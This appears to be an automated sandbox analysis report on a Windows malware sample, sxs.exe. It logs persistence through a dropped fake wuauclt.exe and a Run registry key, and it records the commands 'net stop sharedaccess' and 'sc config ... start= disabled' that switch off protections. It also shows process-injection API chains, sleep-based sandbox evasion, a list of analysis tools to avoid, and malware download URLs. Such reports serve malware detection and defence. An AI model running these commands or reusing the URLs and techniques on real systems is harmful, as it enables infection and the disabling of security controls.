Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wininet.dll
Source: C:\Windows\wuauclt.exe | Section loaded: urlmon.dll
Source: C:\Windows\wuauclt.exe | Section loaded: iertutil.dll
Source: C:\Windows\wuauclt.exe | Section loaded: srvcli.dll
Source: C:\Windows\wuauclt.exe | Section loaded: netutils.dll
Source: C:\Windows\wuauclt.exe | Section loaded: apphelp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: sspicli.dll
Source: C:\Windows\wuauclt.exe | Section loaded: windows.storage.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wldp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: profapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\wuauclt.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\wuauclt.exe | Section loaded: winhttp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: mswsock.dll
Source: C:\Windows\wuauclt.exe | Section loaded: winnsi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: uxtheme.dll
Source: C:\Windows\wuauclt.exe | Section loaded: dnsapi.dll
Source: C:\Windows\wuauclt.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\wuauclt.exe | Section loaded: textshaping.dll
Source: C:\Windows\wuauclt.exe | Section loaded: textinputframework.dll
Source: C:\Windows\wuauclt.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\wuauclt.exe | Section loaded: coremessaging.dll
Source: C:\Windows\wuauclt.exe | Section loaded: ntmarta.dll
Source: C:\Windows\wuauclt.exe | Section loaded: coremessaging.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wintypes.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wintypes.dll
Source: C:\Windows\wuauclt.exe | Section loaded: wintypes.dll
Source: C:\Windows\wuauclt.exe | Section loaded: propsys.dll
Source: C:\Windows\wuauclt.exe | Section loaded: edputil.dll
Source: C:\Windows\wuauclt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\wuauclt.exe | Section loaded: appresolver.dll
Source: C:\Windows\wuauclt.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\wuauclt.exe | Section loaded: slc.dll
Source: C:\Windows\wuauclt.exe | Section loaded: userenv.dll
Source: C:\Windows\wuauclt.exe | Section loaded: sppc.dll
Source: C:\Windows\wuauclt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\wuauclt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
Source: C:\Windows\explorer.exeSection loaded: wininet.dll
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wldp.dll
Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
Source: C:\Windows\explorer.exeSection loaded: netutils.dll
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
Source: C:\Windows\explorer.exeSection loaded: ninput.dll
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: ieframe.dll
Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
Source: C:\Windows\explorer.exeSection loaded: version.dll
Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exeSection loaded: edputil.dll
Source: C:\Windows\explorer.exeSection loaded: secur32.dll
Source: C:\Windows\explorer.exeSection loaded: mlang.dll
Source: C:\Windows\explorer.exeSection loaded: profapi.dll
Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: pcacli.dll
Source: C:\Windows\explorer.exeSection loaded: mpr.dll
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dll
Source: C:\Users\user\Desktop\sxs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Source: initial sampleStatic PE information: section where entry point is pointing to: es2z1
Source: sxs.exeStatic PE information: section name: es2z0
Source: sxs.exeStatic PE information: section name: es2z1
Source: sxs.exeStatic PE information: section name: es2z2
Source: wuauclt.exe.0.drStatic PE information: section name: es2z0
Source: wuauclt.exe.0.drStatic PE information: section name: es2z1
Source: wuauclt.exe.0.drStatic PE information: section name: es2z2
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741C0A push 90909090h; ret 0_3_00741C19
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404024 push 00404075h; ret 0_2_0040406D
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004068D0 push ecx; mov dword ptr [esp], 00000007h0_2_004068D1
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00408494 push ecx; mov dword ptr [esp], 00000007h0_2_00408495
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040481C push 00404848h; ret 0_2_00404840
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404022 push 00404075h; ret 0_2_0040406D
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004068F0 push 0040691Ch; ret 0_2_00406914
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004051C8 push 004052A8h; ret 0_2_004052A0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004051CC push 004052A8h; ret 0_2_004052A0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9EE push ebx; mov dword ptr [esp], 41912273h0_2_0043CA0C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9EE push ecx; mov dword ptr [esp], eax0_2_0043CA60
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004041F4 push 00404220h; ret 0_2_00404218
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9F4 push ebx; mov dword ptr [esp], 41912273h0_2_0043CA0C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9F4 push ecx; mov dword ptr [esp], eax0_2_0043CA60
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043A99B push eax; ret 0_2_0043A99C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C1B1 push ecx; mov dword ptr [esp], eax0_2_0043C1EA
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00439A74 push esi; ret 0_2_00439A80
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00439A26 push esi; ret 0_2_00439A80
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040422C push 00404258h; ret 0_2_00404250
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043AACF push AA6B2F6Ah; rep ret 0_2_0043AAD4
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052F2 push 00405320h; ret 0_2_00405318
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052F4 push 00405320h; ret 0_2_00405318
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052B4 push 004052E0h; ret 0_2_004052D8
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00405364 push 00405390h; ret 0_2_00405388
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00408B1C push 00408B42h; ret 0_2_00408B3A
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040532C push 00405358h; ret 0_2_00405350
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043CBFC push edi; mov dword ptr [esp], edx0_2_0043CC3C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004053AA push 004053D8h; ret 0_2_004053D0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004053AC push 004053D8h; ret 0_2_004053D0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404448 push 00404474h; ret 0_2_0040446C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043CC1B push edi; mov dword ptr [esp], edx0_2_0043CC3C
Source: sxs.exeStatic PE information: section name: es2z1 entropy: 7.783668165941755
Source: wuauclt.exe.0.drStatic PE information: section name: es2z1 entropy: 7.783668165941755

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\sxs.exe | Executable created and started: C:\Windows\wuauclt.exe
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00407BEC URLDownloadToFileA,Sleep,CopyFileA,Sleep,ShellExecuteA, 0_2_00407BEC
Source: C:\Users\user\Desktop\sxs.exe | File created: C:\Windows\wuauclt.exe
Source: C:\Users\user\Desktop\sxs.exe | File created: C:\Windows\wuauclt.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: C:\Users\user\Desktop\sxs.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\user\Desktop\sxs.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_3_00741BC1
Source: C:\Users\user\Desktop\sxs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sxs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sxs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sxs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sxs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\wuauclt.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\wuauclt.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\sxs.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_0-5484
Source: wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: HTTP://WWW.TW7890.COM/TWV/HELP.EXEHTTP://WWW.OM7890.COM/MFX/HELP.EXEHTTP://WWW.HG7890.COM/HGB/HELP.EXEHTTP://WWW.GAMESRB.COM/RBM/HELP.EXES5CREDMGR.EXE;MINISNIFFER.EXE;PACKETCAPTURE.EXE;PEEPNET.EXE;CAPTURENET.EXE;WIRESHARK.EXE;APS.EXE;SOCKMON5.EXE;GAMETROYHORSEDETECT.EXE;FILEMON.EXE;REGMON.EXE;CAPTURE;SNIFFER;
Source: wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: S5CREDMGR.EXE;MINISNIFFER.EXE;PACKETCAPTURE.EXE;PEEPNET.EXE;CAPTURENET.EXE;WIRESHARK.EXE;APS.EXE;SOCKMON5.EXE;GAMETROYHORSEDETECT.EXE;FILEMON.EXE;REGMON.EXE;
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 480000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 900000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 1800000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 300000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 300000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 480000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\sxs.exe TID: 5704 | Thread sleep time: -480000s >= -30000s
Source: C:\Users\user\Desktop\sxs.exe TID: 5272 | Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\Desktop\sxs.exe TID: 5528 | Thread sleep time: -1800000s >= -30000s
Source: C:\Users\user\Desktop\sxs.exe TID: 5304 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 7804 | Thread sleep time: -900000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 7808 | Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 7812 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 9168 | Thread sleep time: -480000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8288 | Thread sleep time: -900000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8260 | Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8252 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00404C8C
Source: C:\Windows\wuauclt.exe | Code function: 4_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_00404C8C
Source: C:\Windows\wuauclt.exe | Code function: 42_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 42_2_00404C8C
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 480000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 900000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 1800000
Source: C:\Users\user\Desktop\sxs.exe | Thread delayed: delay time: 300000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 300000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 480000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exe | Thread delayed: delay time: 300000
Source: wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000005.00000002.2639171790.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 0000000C.00000002.2676620417.00000000014CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV_
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDq5k
Source: explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:@
Source: C:\Users\user\Desktop\sxs.exe | API call chain: ExitProcess graph end node graph_0-7267
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00439FF4 LdrInitializeThunk, 0_2_00439FF4
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_3_00741BC1
Source: C:\Users\user\Desktop\sxs.exe | Memory protected: page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\sxs.exe | Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: 100000 protect: page execute and read and write
